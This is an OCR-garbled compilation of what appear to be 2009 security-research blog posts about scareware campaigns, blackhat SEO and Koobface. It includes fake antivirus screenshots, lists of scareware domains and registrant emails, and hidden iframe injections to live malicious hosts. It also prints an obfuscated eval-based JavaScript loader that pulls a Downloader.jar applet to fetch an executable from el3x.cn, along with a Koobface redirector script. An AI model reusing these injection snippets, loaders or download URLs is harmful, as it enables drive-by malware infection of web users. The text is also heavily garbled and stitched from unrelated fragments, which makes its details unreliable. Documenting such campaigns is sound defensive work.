18:59; 32: Fast Ethernet Car..[0000)[Ref# 0) Blocking incoming UDP: ste=0,0.0.0, dst=255, 255, 255.255, sport=68, dport=67. 

18:58:34: Fast Ethernet Car..[0000)[Ref# 0) Blocking incoming UDP: ste=192.168.100.31, dst=192.168.102.38, sport=9885, dport=137. 
18:58:40: Fast Ethernet Car..[0000)[Ref# 0) Blocking incoming UDP: sre=192.168.100.31, dst=192.169.102.39, sport=9885, dport=137. 
18:58:55: Fast Ethernet Car..[0000)[Ref# 0) Blocking incoming UDP: ste=192.168.100.5, dst=192,168, 103.255, sport=631, dport=631. 
18:58:56: Fast Ethernet Car..[0000)[Ref# 0] Blocking incoming UDP: stc=0.0.0.0, dst=255.255.255.255, sport=68, dport=67. 

18:59:57: Fast Ethernet Car..[0000)[R eft 0) Blocking incoming UDP: stc=192.168.100.31, dst=192.169,102.38, sport=9942, dport=137. 
18:58:59: Fast Ethernet Car..[0000)[Reftt 0] Blocking incoming UDP: sre=192.168.101.64, dst=255.255, 255.255, sport=1735, dport=1900. 
18:59:00: Fast Ethernet Car..[0000)[Ref# 0) Blocking incoming UDP: stc=192.168.100.31, dst=192.168.102.38, sport=9942, dport=137. 
18:59:01: Fast Ethernet Car..[0000)[Reft 0] Blocking incoming UDP: stc=192.168.101.64, dst=255.255, 255.255, sport=1739, dport=1300. 
18:59:06: Fast Ethernet Car..[0000)[Ref# 0) Blocking incoming UDP: src=192.168.100.31, dst=192.168. 102.38, sport=9942, dport=137. 
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[2} View system information 
1 Add or remove programs 


Go Change a settings 


Other Places 


» My Network Places 
CL) My Documents 
3 Shared Documents 


@ Control Pane! 


Do you want to run or save this file? 


nl Name: Install_2022.exe 
Type: Application, 146KB 


From: antimalwrare-Fve-scanv3.com 


® 1 DVD-RAM Drive €:) 


COUUITIIITIIT III) 


f To help protect your computer, Windows Web Security has 
» 


” detected trojans and ready to remove them 


While files from the letemet can be ref, this file type can 
potentially haem your compxter. If you do not trust the source, do not 
fun ce save thet software. What's the rick? 


Detected spyware and adware on your computer Plenamne: 


[7] Admess.Trojan 
() zserv.Transponder.Trojan 
[¥) Wstart. TrojanDownloader 


fanne ane 


11. 18.2008 35 Waiting removal 


11. 18.2008 35 Waiting removal « 


for your system. Trojan-Downloader stesing passwords, credit cards and other 
Aer. 


Remove all Cancel 


Spyware ts software, which can gather information from user's computer through 
Internet connection and send them to ts crestor. Gathered information can be 
passwords, e-mail addresses and all that data, which is important for you. 


bor) as Dossiie! 


| © Bdsvstem cen | 


[10]Scareware domains (delegated) part of their campaigns which as of recently diversity to 
Lycos owned [11]is-the-boss.com: 

anti-spyware-scan-v1 .com - ns1.futureselfdeeds .com (78.47.88.217) 
malware-live-pro-scanvl .com 

premiumlivescanv1 .com 

malwareliveproscanvl1 .com 

antiviruspcscannerv1 .com 

malwareliveproscannervl .com 

freeantispywarescan2 .com 

antiviruspremiumscanv2 .com 

proantivirusscanv2 .com 

antiviruspaymentsystem .com 

macrosoftwarego .com 

advanedmalwarescanner .com 

advanedpromalwarescanner .com 

futureselfdeeds .com 

allinternetfreebies .com 

liveinternetupdates .com 

momentstohaveyou .cn 


Rephrasing [12]the Cardigans Love Fool song - Common sense tells me | shouldn’t bother, 
and | ought to stick to another blackhat SEO campaign, a blackhat SEO campaign that surely 
deserves me, but | think you folks do. 


Thanks to [13]Sean-Paul Correll from PandaLabs for the tip. 


1. http: //ddanchev. blogspot .com/2009/04/confickers-scarewarefake-security.htm 
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Ele €dt Yew Help 


<div class="lead™>a0! goo gyVle pops pets 49 pla) gledels Gert yy pds Geld Ylsy git 
ityle="display: none:"> 


<iframe src="ncttp://www.pagereboot.com/?url#http: //www.balatarin.com/érefresh=1"></iframe> 
<iframe sre="http: //www.pagereboot .com/?url#http: //ghalamnews.com/érefresh=1"></iframe> 


></html> 
<) 


S555 Si gag SS, Gaba orgie & 1 ag Cg Qa 
a 9 arnt Ye Ly QO Gl Sandy plane ple Y old 20) oped yo SIG ero | sorts 9 WlSeS Ol! OS rule gore Sw ld GUS > 
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Mirror saved on: 2008/07/19 16:16 


Defacer: mOsted Domain, httptwww.kaspersky.com.my IP address: 210.48.157.25 


Cn Co 


} pie BUY NOW > —_— | : 4 
Activity Resources Why Kaspersky 
News 
ced peat oon a Kaspersky Internet Security 6/16/2008 
a © User Manuals bean hacked by | 
= ¢ Forum 
By mOsted 
K Inte: Security 7.0 
< encyclopedia of =e ana detec and amen 
Kaspersky 
F conducted by PC’ 
Vi ‘ 
Virus Analyst pte tg Hax0Ored 
Yeti See ied NoW 
mc! \ or 
use and value as well as en 
effectiveness, Kaspersky Intemet 
oe tee Vasnaccbre Totamat Carnie anaved Secunty outshone all competition — 61272008 P| 
H i I || 
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[im for saved or 


[ Detacer: ms 


Domain htty iww kaspersky.com i IP address: 210.48.157.25 


[ system: Vin 2 


- - 
| 
| 
| 


Web server: 1/5/60 


Virus 
Activity 


code green 


wirus achvity 1s 


normal 


own VE A24k 


| suvnowsem® 0 a | Ce 


Resources Why Kaspersky 
ap hoe News 

@ Free Virus anner a 

© Technical Supt fae = Intemet Security 6/16/2008 

o Ujar Masks takes the crown a : 
° Forum Be hacked by 

ave Laspe: 
ig Internet Secunty mOsted 


a superb 


Kaspersky Intermet Security 7.0 @ achiev 
PRO and amen 


“Highly Commended” 6 detection 


Vive Ear Kaspersky 
i i HaxOred 


No War 


FI filrlgt use and v 


effectivene: 
7 nonaccles Tatarnat Sanwites enaved Security 6/12/2008 
PENS 
te Pre b ithe ay thease feo be (ee | eee 
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Kaspersky Lab Antivirus Online 


HuMaHHe! OHS npopepka Naséop OHH Kacnepckoro nokazané, “To B Bawenr 
@ COHEPLYKCH BPEAOHOCHbIA BUPYC, KOTOPbIA NOCTENEHHO 3apaxaeT BCe PahNa Ha 
Bawenm KOMNbI 2 Bupuc BPEMEHHO SA6N0KMPOBSH, HO ero anrop 
NOCTOAHHO MBHRETCA MH OCTSHOBHTb OF0 HE DAHHbI MOMEHT 62 
NPSCAICTSBNReTCA O*KHbIM Dina Tore “Tob YENUTb BP DOHOCHbI- BUPUC, Heo 6xoouUmMo0 
YSHOTb KOKOB HO QOHHbI MOMEHT Y BHPUCS GNFOpPUuTM WHdposGHug”, ANA stor 


ree aa -——— SEES EERE 


K acu Kaspersky Lab 


BeprHo, a ASHHDI MOMENT BHpyC WHd>pyeTCcA HMereO TaKHM CnocoGoM, NO STOPy 
ENPy'C NONHOCTEHO YASNeH C BaWwerO KoembioTepa. Hawnmnte OK, “Tobi npOAOMMHTE 
pasory. 


b 
He YLanur 
BaWweM KOM 
YCTSHOBKS 
MEAT CHTYQUMIO, TOK Kak 
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Kaspersky Lab Antivirus Online 


BHumanuvel!l Onan nposepKea Masopatopun Kacnepc NoKasane, 4uTo 6 sawel 
CHCTEME COHSPLUXEH BPECAOHOCHbIN BHPYC, KOTO 
Bawem KOMMbwTepe. Bupyc BpemMeHHO saGNnoKupo 
NOCTOAHHO M@HRETCA HM OCTSHOBUTs ero 
NPeACTaBAaeTca BOSMOKHEIM. fina Toro YTO 
Y3SHOTb KOKOB HE DSHHbIK MOMEHT Y BHPYC 
HEOSxXOAHMO OTNPSBUTb CMC HA KOpOT ME C TEKCTOM (Se3 
KeBeI4eK). Cronmocts cmc cocrasnaer 150 pusnen. Mc TOro Kk BbI OTNPABMTe CMC BaM 
Mor NbHO GUAeT NOCAGH KNOY OTKNOYahuWH Bupyc Beenute stor Knwy, 4 


NPOrPSMMsG NONHOCTLH YAaNuT BupyCc Bes KOMMbHTepPSs 


Bsennute 


GNOKHPYET BCE ZOCTYNHbIE 
on8 6 Wir Tan Kae 
cepeaHei supyc BCE 
MOTEPE OYEHD CKOPO Ouaut 


Bupyc nponcbie 
CERTOPS MECTKOFO AHCKS 
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LEStsaiiyT 
SHaggseaas5: 
egnaassa 


& 


crypto 
setkey © 
setkey 0 
setkey 
setkey 0 
setkey 
setkey © 
setkey 
setkey © 
setkey 
setkey 
setkey 
setkey © 
setkey 
setkey © 
setkey © 
setkey © 
setkey 
setkey 
setkey 
setkey 


there it worksl 
[699] 

AhnLab-V3 2007.4.21.0 04.20.2007 no virus found 
Antivir 7.3.1.53 04.22.2007 no virus founc 
Authentium 4.93.8 04.20.2007 t irus four 

Avast 4.7,.981.0 04.21.2007 no virus found 
ANG 7.5,0.464 04.22.2007 no virus found 
BitDefender 7.2 04,22 ,2007 no virus found 
CAT-QuickHeal 9,00 04.21.2007 no virus found 
Clamay devel-20070416 04.22.2007 no virus found 
OrWeb 4,33 04.22.2007 no virus found 
eSafe 7.0.15.0 04.22.2007 no virus four 

eTrust-Vet 30.7.3585 04.21.2007 no virus found 
Ewido 4.0 04.22.2007 no virus found 
FileAdvisor 1 04.23.2007 no virus found 
Fortinet 2.85.0.0 04.23.2007 no virus four 

F-Prot 4+.3.2.48 04.20.2007 no virus found 
F-Secure 6.70.13030.0 04.23.2007 no virus found 
Ikarus Tavivk.e 04.23.2007 t ilrus found 
Kaspersky 4.0.2.24 04.23.2007 no virus four 

Mcafee 5014 04.20.2007 no virus four 

Microsoft 1.2405 04.23,2007 no virus found 
NOD32v2 2210 04,.22,2007 no virus found 
Norman 5.80.02 04.21.2007 no virus founc 
Panda 9.0.0.4 04.22.2007 r irus four 

Prevxl V2 04.23.2007 no virus found 
Sophos 4.16.0 04.20.2007 no virus found 
Sunbelt 2.2.907.0 04.19.2007 no virus four 

Symantec 10 04.23.2007 no virus founc 
TheHacker 6.1.6.095 04.15.2007 no virus found 
VBA32 3.11.4 04.21.2007 t irus found 
VirusBuster 4$.3.7:9 04.22.2007 no virus foune 
Webwasher-Gatewa 6.0.1 04.22.2007 no virus found 
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2. bttp://ww.virustotal.com/analisis/2¢e843ef82333acd9c00f2261b7d86e9b50c51e8ac96£ 8edd45d4bb26730849f 2- 12441 


. http: //ddanchev. blogspot .com/2009/05/diverse-portfolio-of-fake-security htm 


. http://ddanchev. blogspot .com/2009/04/massive-blackhat-seo-campaign-serving. htm 


. http://ddanchev. blogspot .com/2009/04/twitter-worm-mikeyy-keywords-hijacked.htm 


. http://ddanchev. blogspot .com/2008/03/new-media-malware-gang-part-four.htm 


. http://ddanchev. blogspot .com/2009/05/gaztranzitstroyinfo-fake-russian-gas . html 
http://www.virustotal.com/analisis/91a295eda0c2ed9517d03e17b184f 6688d6cef 3f 1bea2d021370d47£42d97414- 12441 


. http://ddanchev.blogspot .com/2009/05/diverse-portfolio-of-fake-security.htm 


3 
4 
5 
6. http: //ddanchev. blogspot .com/2007/10/possibility-medias-malware-fiasco.htm 
7 
8 
9 


. http: //google.com/safebrowsing/diagnostic?site=is-the-boss.com 


12. bttp://www.imeem. com/onzeonze/music/vMHfC-nL/the-cardigans-lovefool/ 
13. http://pandalabs.pandasecurity.com/ 


5.6.4 A Diverse Portfolio of Fake Security Software - Part Twenty One 
(2009-06-05 16:37) 


Personal Antivirus 


Best Spyware Protection. Used by Millions World Wide: 


Personal Antrorus has been downloaded over 125 methon bres with mahons more downloads: 
every week People woridunde use and trust Personal Antrrus to protect thee PCs tom 
Spyware adware and other onbne threats 


Enhanced performance: 


Prowdes industry-teading protecbon without sacrificing performance 
Fast scan and trowse speeds 

Less memory use than the average used by competing products 
PC Secunty wth industry leading virus. spyware and Srewall protecton 


Standout Features: Ease of Installation and Support Protection updates: 

= LGht wegnt Ot very fest Pee AMON @ bmOnD Tit OSES DECES Of BMtVT VE PRED COM inch OM TON URES ON) MOM Det 
Sete ore te natal BS Teme COMERCT fee GOW NORDS teanes a8 Mey become avelanie Prowypon! Ihe yew Minny 

- Compretensive Vise Detectoe Gvcily OA) MelBIAE® Bd BCIVENOR Ore 8 AKO ater 1 Need yew COMEWIET BY DNECIOT BperE! Ihe atest Miernet 
eDeONG Pereenel 40H es Wed OF The 00 prOtEINg Peeets ont rans As Soy were pete more Commins Owed 
yOw COmOvIEY SEM A Ore BMowdl Oe MOvENe ON C08) te OPECION by AMEGGy were Drop Ome Persone Antviws 

« Soywere ond Adware Protection Ae 08 PErRONe AROvNUE @ YMO® # Question Sees anee (PSONDD Mem tRNA CMG ME Bay Ce SED aNeet 
PONE AMON TD NOS Otro BORDnEE NOM CeD 1 

- Computer Scare e007e88 Dem You Can emet or cat for ive techeucat 
weet 

~ Mannan Wins Pemere Upsetes 

- revert Unethorced Changes 


« Ennancet Setware Matery Caner 
- tiectve Antvrus Protector 


- Excetent wawe 


home Buy Oceniced featres Support Company Lense nformaton Retard potcy Pruacy Potcy Terma and Condtons 
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Search Results for LA-MARATHON <IFRAME src=//89.149.243.202it> 
Search Results for LA-MARATHON, Repeat this search with context displayed. Biographies, 
A word appears too often: Please refine search. History Topics ... 

stluczka_prv. pl - 2k - Cached - Similar pages 


Search Results for TAPROBANE-ISLAND <IFRAME src=//89.149.243.202it> 
Search Results for TAPROBANE-ISLAND. Repeat this search with context displayed. 
Biographies. A word appears too often: Please refine search. History Topics ... 
www-history.mcs. st-andrews. ac.uk/...//89.149.243.202A%3E - 2k - Cached - Similar pages 


Search Results for PICTURE VIEW-COM <IFRAME src=//89.149.243.202it> 
Search Results for PICTUREVIEW-COM. Repeat this search with context displayed. 
Biographies. A word appears too often: Please refine search. History Topics ... 

www. barkanes, com - 2k - Cached - Similar pages 


Search Results for SERENEX <IFRAME src=H89.149.243.202it> 

Search Results for SERENEX. Repeat this search with context displayed. Biographies. A 
word appears too often: Please refine search. History Topics ... 

www. yookoso, com/redir. php?ID=157 - 2k - Cached - Similar pages 


arch forO ARK-PARI-INN <IF| src=/89.1 
Search Results for DOG-BARK-PARK-INN. Repeat this search with context displayed. 
Biographies. A word appears too ofien: Please refine search. History Topics ... 
hus.zs.pl/ - 2k - Cached - Similar pages 


Seal Results for URBAN-LEGEND. Repeat this search with canal Seolayeds Tigrechies. 
Aword appears too often: Please refine search. History Topics ... 
business. bestreality.ru/ - 2k - Cached - Similar pages 


ch if ACER <IFRAM 


Search Results for SPEED-RACER. Repeat this search with context displayed. Biographies. 
Aword appears too often; Please refine search. History Topics ... 
www. knology.net/resOplht/index. him - Similar pages 


Search Results for NICOLE-LINKLETTER <IFRAME src=//89.149.243.202it> 
Search Results for NICOLE-LINKLETTER, Repeat this search with context displayed. 
Biographies. A word appears too often: ree refine search, History Topics ... 

www. helzovikhotel com/ - 2k - Cached - 


Search Results for JOHN-MCWHORTER <IFRAME src=//89.149.243.202it> 
Search Results for JOHN-MCWHORTER, Repeat this search with context displayed, 
Biographies. A word appears too often: Please refine search. History Topics ... 
limany.org/article_2006_01_7_5139.html - 2k - Cached - Similar pages 


Search Results for DMITRY-MEDVEDEV <IFRAME src=//89.149.243.202it> 
Search Results for DMITRY-MEDVEDEV. Repeat this search with context displayed. 
Biographies. A word appears too often: Please refine search. History Topics ... 

www. coloradoinvestors.com/ - 2k - Cached - Similar pages 
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ISP Location 
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949.214.968.195 DEB view /comole= yes! Myo 


v set 
v sot 
v sot 


PZASAS/OOEB/view/ce. 


help. html 
fconter> 


br> 
br> 


div id*"*Layeri” style*"position:absolute: left: 0px: top: 0px: width: 100px: 
height: 100px; z-index:1; visibility: hidden: "> 


<iframe sro**http://el3x.cn/testi3/index.php”* width#"1" height#*"1"></iframe> 
<iframe arc="http: //kiano-180809.com/oko/heip.huni® width="1*° 
height#*1*></iframe> 
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ohhtml><body> 
<seript type*’text/javascript’ sro#’x.x'></script> 
“seript 
function molot (m) 
{ 
eval (nm); 
) 


function aal () 

{ 

var nB&g9Jqz =""; 

nBSg9Iqz * ‘asdfed sdeadee3i2Sasdfed sdsadee3130asdfed sdsadee3lilasdfsd sdead 
return nB&g9Jqz; 

’ 

xf = aal(): 

var Djeibcsf #'t'; | 
var ErWeMTz2d = KUKUR (xf, DjelbCIf); 

Erv6MTzd © unescape (Erwentzd) ; 

eval ('va't’r x = ut’ nes’+'’c’ +’ at" pe (ErW@SMtzd); molot (x): *) 
+ </seript 
Applet Code="Downloader.class” archive="Downloader.jar” width="0" Height="1"> 
<PARAM NAME “filename” VALUE® “temp, exe "> 


<PARAM NAME="url path” VALUE="http: //el3x.cn/test13/ load. php?apl=javad"> 
<fapplet> 
<SCRIPT LANGUAGE®* “javascript “> 
function fakes () ¥ 
< > 
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200 HTTP us. geocities.com 


text/html 

application... 
text/html; c... 
application... 


jadanbates84/index.htm 1,020 
js_source/puSgeo, js 998 
ja?F=760015488p=geocit... 155 
{js_source/geovck08. js 1,448 
fadanbatesd4findex.htm?... 
{js_source/tab04, html 929 
fis_source/adframeO? html 939 
jus. yimg.comyifus/smbizje... 942 
jus. yimg.comyifus/smbizje... 943 
fus. yimg.comyi/me/mce.js 242 


fisfis.is 


text/html 
text/html 
text/html 
image/gif 
image/aif 
application... 


application;... 


fus.yimg.comfifmejmet .js 98 
jthemis/h.php?curl=http:/... 1,680 
Jus. yimg.comyijme,mc2. js 2,140 
jus. yimg.comyifus/smbiz/b... 1,293 


applicationy... 
text/html; c... 
application... 
image/aif 


} go. ifb ‘p h p 3 
{themisfovad01 js 302 
/us.js.yimg.comylib/smb}js. .. 374 


text/html 
application... 
application)... 


$)1 200 HTTP www.geocities.com 
2 200 HTTP us. adserver, yahoo.com 
$)3 200 HTTP us.geocities.com 
4 us. geocities.com 
95 200 HTTP us. geocities.com 
6 200 HTTP us. geocities.com 
[s)7 200 HTTP us.i1.yimg.com 
is) s 200 HTTP us.i1.yimg.com 
$)9 200 HTTP us.i1.yimg.com 
0 lostart. info 
$)11 = =200 =-HTTP us.i1.yimg.com 
912 200 ~=-HTTP themis.geacities. yahoo.com 
$)13. 200°—sHTTP us.i1.yimg.com 
(§)1¢ = 200 ~—sHTTP us.i1 .yimg.com 
off34.com 

$)i6 = =200.—s-HTTP themis.geacities. yahoo.com 
$)17-200—SsHTTP us.js2.yimg.com 
i youtube-go.com 
fs)i9 = 200 —sHTTP us.i1.yimg.com 
9)20 200 HTTP youtube-go.com 
9) 21 200 HTTP youtube-go.com 
22 304 HTTP youtube-go,com 
O23. 304s HTTP H1.extreme-dm.com 
9)24 ©9200 ~—s«HT TP youtube-go.com 
25 304 HTTP youtube-go.com 
(§)26 200 HTTP e2,extreme-dm.com 
S27 304 HTTP youtube-go,.com 


youtube-go.com 


/?ch=ea= 


jus. yimg.comyifus/smallbiz... in) 
/?ch=kea= in) 
/?ch=kea= 10,476 
iplayer.js Oo 
fi.aif 0 
I 10,476 
iplayer.sw?pid=6123 a 
/s11.q?login=leded&jv=y... 43 
{tom.jpa 0 


iflash_update.exe 
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text/html 
image/gif 
text/html 
text/html 


text/html 


image}aif 


application/... 


The ongoing abuse of AS10929; NETELLIGENT Hosting Services Inc. for scareware distribution 
purposes is peaking once again, which combined with the well-proven traffic acquisition tactics 
the campaigners take advantage of, prompts me to proactively undermine the effectiveness 
of the campaigns by ruining the monetization factor. 


Next to listing the scareware domains currently in circulation, in part twenty one of the 
[1]Diverse Portfolio of Fake Security Software series, it’s time we put the spotlight on the so 
called payment processors mainted by phony in-house operations. 


Protect Your System with The Best Antivirus 


internet Antivirus Pro scware proactively Getects and eliminates more viruses, Wojans, woems, 
adware Spyware Dheshing rocks and other internet Preats Man any program aatabe 
 Antrirus Protecton 

) Anteepyware Protecton 

 Roodat Detecton 

© temernet Worm Protection 


£ « Internet 
2) Antivirus Pro 


Purchase Your Internet Antivirus Pro Subscription Now 


3 Year Subscription For Only $499-5 $89.95 a 182%) [OFF 
Hlernet Antrirus Pro Softerare License Bimited 
For just $89.95 for 3 year Sofware License( single Ecense: Offer, 
This IS & One-tNe Charpe You will not be 1ebdied 
1 Year Subscription For Only $4+66-5 $59.95 (64%) [OFF 
Nternet Antrirus Pro Softerere License 
For just $59.95 for 1 pear Software License(engle Bcense 
Thés Is 2 One@-Bne chaps You wil not be rebeied 
6 Month Subscription For Only 6 $49,95 (OH CLP 
Hiternet Antirus Pro Softerere License 
For just $49.95 fee 6 moet Seware Licensecongie Bcense | purcnase Now | 
Thies tS 2 ON@-trNe Charge You wil net De relied 

SASETY SECURITY 

Ad OFGOrs are Backed wah our 100% money back Quarartee! 

Secure Server(yn) - even safer Man over the phone! =e 


Your Emad Address ang Personal intormaton are private and NEVER resold or Grsclosed to turd partes 


The following [2]scareware domains are [3]parked exclusively within AS10929; NETELLIGENT 
Hosting Services Inc’s network, 209.44.126.102 in particular : 


fanscan4 .com 209.44.126.102 Email: brmargul@gmail.com 
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We wish you 
a Merry Christmas 
and a Happy New 


2010 Year: 


We wish you 
a Merry Christmas 
and a Happy New 


2010 Year!’ 
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Video posted by -WizArD- 


Adobe Flach Stayer Update 


This coetent oequires Adobe Flach 


Ptayer 00.37, Would you lhe te morale 


Embed: 


More From user 


Rebted Video 


Reweed Vases 


Video Responses: 10 Text Comments: 70 


babachat (4 hours ago) 
Funniest thing EVER!! 
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Net-Worm.Win32.Koobface 
Evolution of new modifications identified by Kaspersky Lab 
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<object width-"425" hesght-"344">< 


Sian Up | Quickies (0) | Heb | Looe 


Frome -WArD- 
Joned: 1 year ago 
Videos: 5 


Subscibe 


Custo ue 
param name="movie" 
1200 
1000 


800 


600 


400 


Search 


Yougii | 


Home Videos Channels 


Sexy Hidden Camera A) 


F ADOBE" FLASH” PLAYER 


An update to your Ad 


Fiaee Puayer emtences pour Ved browsing erpenence 


Thy wpetote inet matey 


© Full epee, HO vices playbed 
© Cem et tee ue! eMac he! bring Met exrerences to Mle 


© Fane performance 


Res: aro 
Gaable you update scticasora, che 


Upetateny Wes erator 9 erate Gn Oe eEhared Fe) Fe SLA Hepered 


Renrdwetse)} (Denied) 


KKKKS 482,245 wews 

Favorite + Share Playlists Flag 
fySpece Facetcck Twitter more share options 
enricucho33 (1 ft Recly «4 
But the guis say that she doesn! care about the size 
But all the girls was staring at the erected penis..and she was laughing 
They think im penises all the time. | 
Freeportku001 Res 
you een he . girldo think abou tthe penis 
yoyohooyo (1 t Resly +4 
tol 

Showing 10 o comments Show More Comments ew All 33 comments 


Would you like to comment? 


bin YouT or sign in you are akeady a member 


or a free account 


ted with Hy 
oveds thes stamp, be 
hitp: ‘Awww. hyperio 


e Try YouTube in a new 


web browser! Do 


Search 


hidden camera 


Get Het Privacy Pe 


be Maccbeck 
emrunt _ 
re Safety Center 
‘eeers ie 
Workdwide Show bcatens 
English Show wnguages 


ovTube, LLC 
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Create Account or Sign In 


Subscriptions History Upload | 


URL |nme 


Embed | <ctject wiss#"425" heignse”24e><carav) 


> More From: 7770robi 
+ Related Videos 


Jija ji Part 7 ww PulijaBi- 
TaDKA.CoM 


randhawal2 

Featured Video 
Hidden camera. rebel 
miniskirt 


Sunbed babe. Hidden 
m= camera. 


stumersha 


i skrite Kamera 
u 


ees Skrivena Kamere stkle 


Add YouTube to your Google homepage 
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// KROTEG 


Hey there! foxairn is using Twitter. 


Twitter is a free service that lets you keep in touch with people through 
the exchange of quick, frequent answers to one simple question: What 
are you doing? Join today to start receiving foxairn's updates. 


Login Join Twitter! 


Already using Twitter 
trom your phone’? Click here, 


‘Name peg beisel mcilwaine 
= Location Ann Arbor, Michigan 
foxairn Blo AKC dog show judge 
4 15 
following followers 
. : Updates 5 
My home video :) http://tinyurl.com Paice 
/l4bslp —— 
8.57 AM Jul 1st from web ee 
michaeljackson' testament on youtube http:/tinyurl.com/magnas a ~ 
4:55 PM Jun 26th from web RSS feed of foxaim's updates 
Watch my new private video! LOL :) http://tinyurl.com/magnas 
& 17 AM Jun 26th from web 
[724] 
[Weperest » Jovescriet Ropert For bte://90.40.104.169/0x368/ } 


var pjirxkhds = 
{' facebook 


{' tagged.com', 


.com', '£b2'), 
‘tg/view'), 


{' frtendster.com','fr"], 
' 


pyspace 
{'msplinks.com', ‘ms'), 


{' fubar.com', ‘fu"), 
{‘ewsteer.com', ‘te'), 
{'hiS.com', ‘has'), 
{'bebo.com', ‘be') 


var wnicxtduvsylepjqo = [ 
*90.40.164.169', 
*66.106.61.148', 
*64.64.214.75", 
*90.223.195.115', 
*79.202.34.126', 
*96.20.136.220', 
*7S.74,201.232', 
*77,127.110.15', 
*4,.154.55.209", 
*94.196.173.166", 
*87.68.50.238', 
*213.6.97.76', 
'72.128.68.118', 
'68.90.178.26", 
*201.223.24.185"]2 
var soacbvrux 


6 = *', folgacrpié = '', rywgpeS = °', yomyfseajckihvxpovbuz = '': 


var roatjfdxecqruniyges = '' + eval(' doc’ ssoacbwrux6é+' use' +folgacrpié+'nt.r' erywgpeSe’ efer' +yomgfseajrkihwxpovbuze'rer’), uojdpitksbald = '': 
for (var wszeporitvexntj)S = 0; wszeporltvexmfj)S < pjirxkbdS.length: wszeporltvcexmtj5 ++) ( 


22946 


Af ((roatjfdxecqruniygmé. indexOr (pjirxkbdS(wszeporltvexntj35)(0}}) ‘= -1)) ¢ 


wojdpitksbalO = '/f*' + pjirxkbdS[wszeporitvexntj5) (1): 
break: 
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rayscan4 .com Email: brmargul@gmail.com 
scantop4 .com Email: ansouthe@gmail.com 
scanlist6 .com Email: metamant@gmail.com 
goscanfine .com Email: chirelgas@gmail.com 
goscanone .com Email: canrcnad@gmail.com 
scan4note .com Email: ansouthe@gmail.com 
in4ck .com Email: taboussybr@gmail.com 
goscanwork .com Email: govemati@gmail.com 
in4tk .com Email: skeltonrw@gmail.com 
goscanatom .com Email: gleyersth@gmail.com 
top4scan .com Email: ansouthe@gmail.com 
slot6scan .com Email: metamant@gmail.com 
gometascan .com Email: ricboin@gmail.com 
gopagescan .com Email: tanehen@gmail.com 
gofinescan .com Email: alcnafuch@gmail.com 
goelitescan .com Email: funully@gmail.com 
gorankscan .com Email: canrcnad@gmail.com 
goworkscan .com Email: govemati@gmail.com 
gogoalscan .com Email: chinrfi@gmail.com 
gogenscan .com Email: tanehen@gmail.com 
goautoscan .com Email: tanehen@gmail.com 
goflexscan .com Email: alcnafuch@gmail.com 
goscanauto .com Email: canrcnad@gmail.com 
scan6slot .com Emaik: telerdomb@gmail.com 
in4st .com Email: skeltonrw@gmail.com 
scan6list .com Email: telerdomb@gmail.com 
goscanflex .com Email: chirelgas@gmail.com 
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RETN-AS 


~ 7 
IN 


mat S 
AS6453 
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goscankey .com Email: ricboin@gmail.com 
scanmeta4 .info Email: sitintu@gmail.com 
scannote4 .info Email: sitintu@gmail.com 
metascan4 .info Email: finewnrk@gmail.com 
zonescan4 .info Email: mexnacc@gmail.com 
notescan4 .info Email: finewnrk@gmail.com 
miniscan4 .info Email: finewnrk@gmail.com 
rankscan4 .info Email: mexnacc@gmail.com 
atomscan4 .info Email: finewnrk@gmail.com 
fanscan4 .info Email: finewnrk@gmail.com 
genscan4 .info Email: finewnrk@gmail.com 
autoscan4 .info Email: sitintu@gmail.com 
topscan4 .info Email: finewnrk@gmail.com 
starscan4 .info Email: finewnrk@gmail.com 
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22964 


196 [1] 22:23:18 07-02-2009 
195 [1] 21:38:50 07-02-2009 
194 [1] 20:13:07 07-02-2009 
193 [1] 15:05:18 07-02-2009 
192 [1] 14:56:51 07-02-2009 
191 [1] 14:44:31 07-02-2009 
190 [1] 14:41:49 07-02-2009 
189 [1] 14:40:36 07-02-2009 
188 [1] 14:31:36 07-02-2009 
187 [1] 14:12:07 07-02-2009 
186 [1] 14:02:59 07-02-2009 
185 [1] 14:02:41 07-02-2009 
184 [1] 14:02:40 07-02-2009 
183 [1] 14:02:36 07-02-2009 
182 [1] 14:02:35 07-02-2009 
181 [1] 14:02:33 07-02-2009 
180 [1] 14:02:32 07-02-2009 
179 [1] 14:02:31 07-02-2009 
178 [1] 14:02:30 07-02-2009 
177 [1] 14:02:29 07-02-2009 


x) 


Country 

DB Portugal 

= United States 
Ga turkey 


[EC United Arab Emirates 
EC united Arab Emirates 


Germany 

Brazil 

Brazil 

GB Bangladesh 
iste United Kingdom 
Pakistan 

tas Ghana 

Brazil 

Brazil 

EES United Kingdom 
Brazil 

2 Argentina 
Brazil 

(2?) 


Brazil 


P 
89,214.238.19 
98.148.104.59 
88.240.80.114 
87.200.83.122 
80.227 106.50 
84.63.56.214 
189.26.146.192 
201.2.1.36 
123.49.32.74 
$6.160.191.65 
202.163.118.14 
41.204 58.241 
201 .39.99.200 
201.17.117.142 
89.243.27 150 
201 26.41.45 
190.136.131.24 
201 .75.0.154 
190.135.152.1¢ 
201 .8.218.43 


[753] 


First time 

2009-02-07 22:23:18 
2009-02-07 21:38:50 
2008-02-07 20:13:07 
2009-02-07 15:05:18 
2009-02-07 14:56:51 
2008-02-07 14:44:31 
2009-02-07 14:41:49 
2009-02-07 14:40:36 
2009-02-07 14:31:36 
2008-02-07 14:12:07 
2008-02-07 14:02:59 
2009-02-07 14:02:41 
2008-02-07 14:02:40 
2009-02-07 14:02:36 
2009-02-07 14:02:35 
2008-02-07 14:02:33 
2009-02-07 14:02:32 
2009-02-07 14:02:31 
2009-02-07 14:02:30 
2009-02-07 14:02:29 


Last time 

2009-02-07 22:23:18 
2009-02-07 21:38:50 
2009-02-07 20:13:07 
2009-02-07 15:05:18 
2009-02-07 14:56:51 
2009-02-08 10:59; 21 
2009-02-07 14:41:49 
2009-02-07 14:40:36 
2009-02-08 12:01:37 
2009-02-07 14:12:07 
2009-02-07 14:02:59 
2009-02-07 14:02:41 
2009-02-07 14:02:40 
2009-02-07 14:02:36 
2009-02-07 14:02:35 
2009-02-07 14:02:33 
2009-02-07 14:02:32 
2009-02-07 14:02:31 
2009-02-07 14:02:30 
2009-02-07 14:02:29 


Displaying 1 - 


100 of 196 


P) List bots 


[1] 22:23:16 07-02-2009 


x; test 


195 [1] 21:38:50 07-02-2009 


x; test 


[1] 20:13:07 07-02-2009 
ll 
o rey: test 
[1] 15:05:18 07-02-2009 


193 


x; test 


[1] 14:56:51 07-02-2003 


x: test 


[1] 14:44:31 07-02-2003 


L¢ rey: test 
[1] 14:41:49 07-02-2009 
vy: test 


